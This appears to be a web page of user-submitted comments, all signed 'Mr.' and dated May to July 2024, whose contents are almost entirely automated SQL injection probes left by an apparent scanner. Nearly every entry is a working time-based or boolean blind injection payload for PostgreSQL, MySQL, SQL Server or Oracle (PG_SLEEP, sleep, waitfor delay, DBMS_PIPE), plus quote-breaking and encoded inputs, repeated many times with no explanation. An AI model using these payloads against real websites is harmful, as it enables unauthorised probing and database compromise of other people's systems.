5/30/2024 9:48 AM
Mr.

-5) OR 958=(SELECT 958 FROM PG_SLEEP(15))--

5/30/2024 9:48 AM
Mr.

-1)) OR 131=(SELECT 131 FROM PG_SLEEP(15))--

5/30/2024 9:48 AM
Mr.

jXLg5oku' OR 442=(SELECT 442 FROM PG_SLEEP(15))--

5/30/2024 9:48 AM
Mr.

SVOY3VOB') OR 413=(SELECT 413 FROM PG_SLEEP(15))--

5/30/2024 9:48 AM
Mr.

HLEk7KFX')) OR 678=(SELECT 678 FROM PG_SLEEP(15))--

5/30/2024 9:48 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/30/2024 9:48 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/30/2024 9:48 AM
Mr.

1'"

5/30/2024 9:48 AM
Mr.

1����%2527%2522

5/30/2024 9:48 AM
Mr.

@@qkGy3

5/30/2024 9:52 AM
Mr.

oqmg5eeW

5/30/2024 9:52 AM
Mr.

1*

5/30/2024 9:52 AM
Mr.

1*

5/30/2024 9:52 AM
Mr.

1*

5/30/2024 9:52 AM
Mr.

1*

5/30/2024 9:52 AM
Mr.

-1 OR 2+408-408-1=0+0+0+1

5/30/2024 9:52 AM
Mr.

-1 OR 3+408-408-1=0+0+0+1

5/30/2024 9:52 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/30/2024 9:52 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/30/2024 9:52 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/30/2024 9:52 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/30/2024 9:52 AM
Mr.

-1; waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

-1); waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

1 waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

KchLjOBp'; waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

IwAFjECU'); waitfor delay '0:0:15' --

5/30/2024 9:52 AM
Mr.

ma9ANrIx')); waitfor delay '0:0:15' --

5/30/2024 9:53 AM
Mr.

-5 OR 496=(SELECT 496 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

-5) OR 49=(SELECT 49 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

-1)) OR 54=(SELECT 54 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

nYnwewTA' OR 175=(SELECT 175 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

XZNO0lme') OR 556=(SELECT 556 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

sq1CT8pW')) OR 377=(SELECT 377 FROM PG_SLEEP(15))--

5/30/2024 9:53 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/30/2024 9:53 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/30/2024 9:53 AM
Mr.

1'"

5/30/2024 9:53 AM
Mr.

1����%2527%2522

5/30/2024 9:53 AM
Mr.

@@iXbr0

5/31/2024 5:48 AM
Mr.

aIt841M0

5/31/2024 5:48 AM
Mr.

1*

5/31/2024 5:48 AM
Mr.

1*

5/31/2024 5:48 AM
Mr.

1*

5/31/2024 5:48 AM
Mr.

1*

5/31/2024 5:48 AM
Mr.

-1 OR 2+532-532-1=0+0+0+1

5/31/2024 5:48 AM
Mr.

-1 OR 3+532-532-1=0+0+0+1

5/31/2024 5:48 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/31/2024 5:48 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/31/2024 5:48 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/31/2024 5:48 AM
Mr.

-1; waitfor delay '0:0:15' --

5/31/2024 5:48 AM
Mr.

-1); waitfor delay '0:0:15' --

5/31/2024 5:48 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/31/2024 5:49 AM
Mr.

1 waitfor delay '0:0:15' --

5/31/2024 5:49 AM
Mr.

Gu8uMEwd'; waitfor delay '0:0:15' --

5/31/2024 5:49 AM
Mr.

CMotqCt7'); waitfor delay '0:0:15' --

5/31/2024 5:49 AM
Mr.

-5 OR 988=(SELECT 988 FROM PG_SLEEP(15))--

5/31/2024 5:49 AM
Mr.

-5) OR 537=(SELECT 537 FROM PG_SLEEP(15))--

5/31/2024 5:49 AM
Mr.

TDjekQbA') OR 61=(SELECT 61 FROM PG_SLEEP(15))--

5/31/2024 5:49 AM
Mr.

PhHnpem6')) OR 646=(SELECT 646 FROM PG_SLEEP(15))--

5/31/2024 5:50 AM
Mr.

@@BCv6x

5/31/2024 5:50 AM
Mr.

1*

5/31/2024 5:50 AM
Mr.

1*

5/31/2024 5:50 AM
Mr.

1*

5/31/2024 5:50 AM
Mr.

1*

5/31/2024 5:50 AM
Mr.

-1 OR 3+35-35-1=0+0+0+1

5/31/2024 5:50 AM
Mr.

-1 OR 3*2<(0+5+35-35)

5/31/2024 5:50 AM
Mr.

-1 OR 3*2>(0+5+35-35)

5/31/2024 5:50 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/31/2024 5:50 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/31/2024 5:50 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/31/2024 5:51 AM
Mr.

-1); waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

1 waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

RnuiZPJX'; waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

fdKe19b9'); waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

TPx5LW4T')); waitfor delay '0:0:15' --

5/31/2024 5:51 AM
Mr.

-5 OR 362=(SELECT 362 FROM PG_SLEEP(15))--

5/31/2024 5:51 AM
Mr.

-5) OR 202=(SELECT 202 FROM PG_SLEEP(15))--

5/31/2024 5:51 AM
Mr.

-1)) OR 489=(SELECT 489 FROM PG_SLEEP(15))--

5/31/2024 5:52 AM
Mr.

xNmc4x3v' OR 115=(SELECT 115 FROM PG_SLEEP(15))--

5/31/2024 5:52 AM
Mr.

-1 OR 2+180-180-1=0+0+0+1 --

5/31/2024 5:52 AM
Mr.

-1 OR 3*2<(0+5+180-180) --

5/31/2024 5:52 AM
Mr.

-1 OR 2+656-656-1=0+0+0+1

5/31/2024 5:52 AM
Mr.

DYSQtzLO') OR 317=(SELECT 317 FROM PG_SLEEP(15))--

5/31/2024 5:52 AM
Mr.

-1 OR 3*2<(0+5+656-656)

5/31/2024 5:52 AM
Mr.

-1' OR 2+990-990-1=0+0+0+1 --

5/31/2024 5:52 AM
Mr.

-1' OR 3+990-990-1=0+0+0+1 --

5/31/2024 5:52 AM
Mr.

-1' OR 2+544-544-1=0+0+0+1 or 'si5miMev'='

5/31/2024 5:52 AM
Mr.

-1' OR 3+544-544-1=0+0+0+1 or 'si5miMev'='

5/31/2024 5:52 AM
Mr.

-1" OR 2+192-192-1=0+0+0+1 --

5/31/2024 5:52 AM
Mr.

mM7IlDrs')) OR 729=(SELECT 729 FROM PG_SLEEP(15))--

5/31/2024 5:52 AM
Mr.

if(now()=sysdate(),sleep(15),0)

5/31/2024 5:52 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/31/2024 5:52 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/31/2024 5:52 AM
Mr.

1'"

5/31/2024 5:52 AM
Mr.

1����%2527%2522

5/31/2024 5:52 AM
Mr.

@@mHBgm

5/31/2024 5:52 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/31/2024 5:52 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/31/2024 5:52 AM
Mr.

-1; waitfor delay '0:0:15' --

5/31/2024 5:52 AM
Mr.

-1); waitfor delay '0:0:15' --

5/31/2024 5:52 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/31/2024 5:52 AM
Mr.

1 waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

-1 OR 2+636-636-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

-1 OR 3+636-636-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

-1 OR 2+107-107-1=0+0+0+1

5/31/2024 5:53 AM
Mr.

-1 OR 3+107-107-1=0+0+0+1

5/31/2024 5:53 AM
Mr.

-1' OR 2+560-560-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

-1' OR 3+560-560-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

-1' OR 2+39-39-1=0+0+0+1 or 'ChFg7TAT'='

5/31/2024 5:53 AM
Mr.

-1' OR 3+39-39-1=0+0+0+1 or 'ChFg7TAT'='

5/31/2024 5:53 AM
Mr.

e7djM4Rp'; waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

-1" OR 2+272-272-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

-1" OR 3+272-272-1=0+0+0+1 --

5/31/2024 5:53 AM
Mr.

CgdRXuTg'); waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

BNgIkR9Z')); waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

5/31/2024 5:53 AM
Mr.

-5 OR 693=(SELECT 693 FROM PG_SLEEP(15))--

5/31/2024 5:53 AM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

5/31/2024 5:53 AM
Mr.

-5) OR 534=(SELECT 534 FROM PG_SLEEP(15))--

5/31/2024 5:53 AM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5/31/2024 5:53 AM
Mr.

-1; waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

xdvPCFtX' OR 524=(SELECT 524 FROM PG_SLEEP(15))--

5/31/2024 5:53 AM
Mr.

-1); waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

Tczym2Xc') OR 301=(SELECT 301 FROM PG_SLEEP(15))--

5/31/2024 5:53 AM
Mr.

-1)); waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

HR46CgP8')) OR 385=(SELECT 385 FROM PG_SLEEP(15))--

5/31/2024 5:53 AM
Mr.

1 waitfor delay '0:0:15' --

5/31/2024 5:53 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/31/2024 5:53 AM
Mr.

1'"

5/31/2024 5:53 AM
Mr.

1����%2527%2522

5/31/2024 5:53 AM
Mr.

@@EKzLS

5/31/2024 5:53 AM
Mr.

CjNndWM5'); waitfor delay '0:0:15' --

5/31/2024 5:54 AM
Mr.

GiRhMBTr')); waitfor delay '0:0:15' --

5/31/2024 5:54 AM
Mr.

-5 OR 889=(SELECT 889 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

-5) OR 71=(SELECT 71 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

-1)) OR 501=(SELECT 501 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

Wr2MrTMY' OR 418=(SELECT 418 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

JELVigcK') OR 51=(SELECT 51 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

ArSVaEF9')) OR 470=(SELECT 470 FROM PG_SLEEP(15))--

5/31/2024 5:54 AM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

5/31/2024 5:54 AM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

5/31/2024 5:54 AM
Mr.

1'"

5/31/2024 5:54 AM
Mr.

1����%2527%2522

5/31/2024 5:54 AM
Mr.

@@x10gb

7/1/2024 7:51 PM
Mr.

1*

7/1/2024 7:51 PM
Mr.

1*

7/1/2024 7:51 PM
Mr.

1*

7/1/2024 7:51 PM
Mr.

-1 OR 2+535-535-1=0+0+0+1

7/1/2024 7:51 PM
Mr.

-1 OR 3+535-535-1=0+0+0+1

7/1/2024 7:51 PM
Mr.

if(now()=sysdate(),sleep(15),0)

7/1/2024 7:51 PM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

7/1/2024 7:51 PM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

7/1/2024 7:51 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

7/1/2024 7:51 PM
Mr.

-1; waitfor delay '0:0:15' --

7/1/2024 7:51 PM
Mr.

-1); waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

-1)); waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

1 waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

EHO7L4aI'; waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

Mm1Qr6TE'); waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

azM6O3WP')); waitfor delay '0:0:15' --

7/1/2024 7:52 PM
Mr.

-5 OR 640=(SELECT 640 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

-5) OR 36=(SELECT 36 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

-1)) OR 346=(SELECT 346 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

mI2VdibF' OR 354=(SELECT 354 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

Vln7HZrm') OR 838=(SELECT 838 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

bOWr0EUb')) OR 484=(SELECT 484 FROM PG_SLEEP(15))--

7/1/2024 7:53 PM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

7/1/2024 7:54 PM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

7/1/2024 7:54 PM
Mr.

1'"

7/1/2024 7:54 PM
Mr.

1����%2527%2522

7/1/2024 7:54 PM
Mr.

@@VBfyG

7/1/2024 7:54 PM
Mr.

Yj3vDgqM

7/1/2024 7:54 PM
Mr.

1*

7/1/2024 7:54 PM
Mr.

1*

7/1/2024 7:54 PM
Mr.

1*

7/1/2024 7:55 PM
Mr.

1*

7/1/2024 7:55 PM
Mr.

-1 OR 2+474-474-1=0+0+0+1

7/1/2024 7:55 PM
Mr.

-1 OR 3+474-474-1=0+0+0+1

7/1/2024 7:55 PM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

7/1/2024 7:55 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

7/1/2024 7:55 PM
Mr.

-1; waitfor delay '0:0:15' --

7/1/2024 7:56 PM
Mr.

-1)); waitfor delay '0:0:15' --

7/1/2024 7:56 PM
Mr.

1 waitfor delay '0:0:15' --

7/1/2024 7:56 PM
Mr.

oakbRpT4'; waitfor delay '0:0:15' --

7/1/2024 7:56 PM
Mr.

kdjtSNMc'); waitfor delay '0:0:15' --

7/1/2024 7:56 PM
Mr.

-5 OR 423=(SELECT 423 FROM PG_SLEEP(15))--

7/1/2024 7:56 PM
Mr.

-5) OR 813=(SELECT 813 FROM PG_SLEEP(15))--

7/1/2024 7:56 PM
Mr.

-1)) OR 949=(SELECT 949 FROM PG_SLEEP(15))--

7/1/2024 7:57 PM
Mr.

WhJMBy4J' OR 18=(SELECT 18 FROM PG_SLEEP(15))--

7/1/2024 7:57 PM
Mr.

rNRfOmfb') OR 961=(SELECT 961 FROM PG_SLEEP(15))--

7/1/2024 7:57 PM
Mr.

DKXAKCDL')) OR 931=(SELECT 931 FROM PG_SLEEP(15))--

7/1/2024 7:57 PM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

7/1/2024 7:57 PM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

7/1/2024 7:57 PM
Mr.

1'"

7/1/2024 7:57 PM
Mr.

1����%2527%2522

7/1/2024 8:01 PM
Mr.

-1 OR 2+222-222-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

-1 OR 3+222-222-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

-1 OR 2+434-434-1=0+0+0+1

7/1/2024 8:01 PM
Mr.

-1 OR 3+434-434-1=0+0+0+1

7/1/2024 8:01 PM
Mr.

-1' OR 2+503-503-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

-1' OR 3+503-503-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

-1' OR 2+424-424-1=0+0+0+1 or 'JTavfiKe'='

7/1/2024 8:01 PM
Mr.

-1' OR 3+424-424-1=0+0+0+1 or 'JTavfiKe'='

7/1/2024 8:01 PM
Mr.

-1" OR 2+771-771-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

-1" OR 3+771-771-1=0+0+0+1 --

7/1/2024 8:01 PM
Mr.

if(now()=sysdate(),sleep(15),0)

7/1/2024 8:02 PM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

7/1/2024 8:02 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

7/1/2024 8:02 PM
Mr.

-1; waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

-1); waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

-1 OR 2+836-836-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

-1 OR 3+836-836-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

-1 OR 2+724-724-1=0+0+0+1

7/1/2024 8:02 PM
Mr.

-1 OR 3+724-724-1=0+0+0+1

7/1/2024 8:02 PM
Mr.

-1' OR 2+482-482-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

-1' OR 3+482-482-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

-1' OR 2+769-769-1=0+0+0+1 or 'k10FuXP0'='

7/1/2024 8:02 PM
Mr.

-1' OR 3+769-769-1=0+0+0+1 or 'k10FuXP0'='

7/1/2024 8:02 PM
Mr.

-1" OR 2+298-298-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

-1" OR 3+298-298-1=0+0+0+1 --

7/1/2024 8:02 PM
Mr.

if(now()=sysdate(),sleep(15),0)

7/1/2024 8:02 PM
Mr.

1 waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

7/1/2024 8:02 PM
Mr.

vtdKsQl3'; waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

7/1/2024 8:02 PM
Mr.

moKNKhZa'); waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

7/1/2024 8:02 PM
Mr.

PA6S4WR3')); waitfor delay '0:0:15' --

7/1/2024 8:02 PM
Mr.

-1; waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

-1); waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

-5) OR 86=(SELECT 86 FROM PG_SLEEP(15))--

7/1/2024 8:03 PM
Mr.

-1)); waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

-1)) OR 515=(SELECT 515 FROM PG_SLEEP(15))--

7/1/2024 8:03 PM
Mr.

1 waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

rPTcxcH9' OR 560=(SELECT 560 FROM PG_SLEEP(15))--

7/1/2024 8:03 PM
Mr.

RB21LTvi'; waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

LBwTqP0L') OR 545=(SELECT 545 FROM PG_SLEEP(15))--

7/1/2024 8:03 PM
Mr.

ZyTxIouL'); waitfor delay '0:0:15' --

7/1/2024 8:03 PM
Mr.

vLhbiVsn')) OR 756=(SELECT 756 FROM PG_SLEEP(15))--

7/1/2024 8:03 PM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

7/1/2024 8:04 PM
Mr.

-5 OR 915=(SELECT 915 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

7/1/2024 8:04 PM
Mr.

1'"

7/1/2024 8:04 PM
Mr.

1����%2527%2522

7/1/2024 8:04 PM
Mr.

@@inNBW

7/1/2024 8:04 PM
Mr.

-5) OR 136=(SELECT 136 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

-1)) OR 739=(SELECT 739 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

8taD6ej6' OR 784=(SELECT 784 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

t29pu9iH') OR 769=(SELECT 769 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

pRIh6aYt')) OR 223=(SELECT 223 FROM PG_SLEEP(15))--

7/1/2024 8:04 PM
Mr.

-1 OR 2+873-873-1=0+0+0+1 --

7/1/2024 8:04 PM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

7/1/2024 8:04 PM
Mr.

-1 OR 3*2>(0+5+873-873) --

7/1/2024 8:04 PM
Mr.

-1 OR 2+1-1-1=1 AND 873=873 --

7/1/2024 8:04 PM
Mr.

-1 OR 2+1-1+1=1 AND 873=873 --

7/1/2024 8:04 PM
Mr.

-1 OR 2+64-64-1=0+0+0+1

7/1/2024 8:04 PM
Mr.

-1 OR 3+64-64-1=0+0+0+1

7/1/2024 8:04 PM
Mr.

-1' OR 2+305-305-1=0+0+0+1 --

7/1/2024 8:04 PM
Mr.

-1' OR 3+305-305-1=0+0+0+1 --

7/1/2024 8:04 PM
Mr.

-1' OR 2+454-454-1=0+0+0+1 or 'BD7gkRuG'='

7/1/2024 8:04 PM
Mr.

-1' OR 3+454-454-1=0+0+0+1 or 'BD7gkRuG'='

7/1/2024 8:05 PM
Mr.

-1" OR 2+756-756-1=0+0+0+1 --

7/1/2024 8:05 PM
Mr.

-1" OR 3+756-756-1=0+0+0+1 --

7/1/2024 8:05 PM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

7/1/2024 8:05 PM
Mr.

1'"

7/1/2024 8:05 PM
Mr.

1����%2527%2522

7/1/2024 8:05 PM
Mr.

@@2ibKy

7/1/2024 8:05 PM
Mr.

if(now()=sysdate(),sleep(15),0)

7/1/2024 8:05 PM
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

7/1/2024 8:05 PM
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

7/1/2024 8:05 PM
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

7/1/2024 8:05 PM
Mr.

-1; waitfor delay '0:0:15' --

7/1/2024 8:05 PM
Mr.

-1); waitfor delay '0:0:15' --

7/1/2024 8:06 PM
Mr.

1 waitfor delay '0:0:15' --

7/1/2024 8:06 PM
Mr.

RWwu06cd'; waitfor delay '0:0:15' --

7/1/2024 8:06 PM
Mr.

fKLLMRSI'); waitfor delay '0:0:15' --

7/1/2024 8:06 PM
Mr.

CqHu1FrX')); waitfor delay '0:0:15' --

7/1/2024 8:06 PM
Mr.

-5 OR 370=(SELECT 370 FROM PG_SLEEP(15))--

7/1/2024 8:06 PM
Mr.

-5) OR 476=(SELECT 476 FROM PG_SLEEP(15))--

7/1/2024 8:06 PM
Mr.

-1)) OR 514=(SELECT 514 FROM PG_SLEEP(15))--

7/1/2024 8:06 PM
Mr.

ygbde3u5' OR 848=(SELECT 848 FROM PG_SLEEP(15))--

7/1/2024 8:07 PM
Mr.

NtJVYrIO') OR 279=(SELECT 279 FROM PG_SLEEP(15))--

7/1/2024 8:07 PM
Mr.

G73ZwLCC')) OR 348=(SELECT 348 FROM PG_SLEEP(15))--

7/1/2024 8:07 PM
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

7/1/2024 8:07 PM
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

7/1/2024 8:07 PM
Mr.

1'"

7/1/2024 8:07 PM
Mr.

1����%2527%2522

7/1/2024 8:07 PM
Mr.

@@HcU9y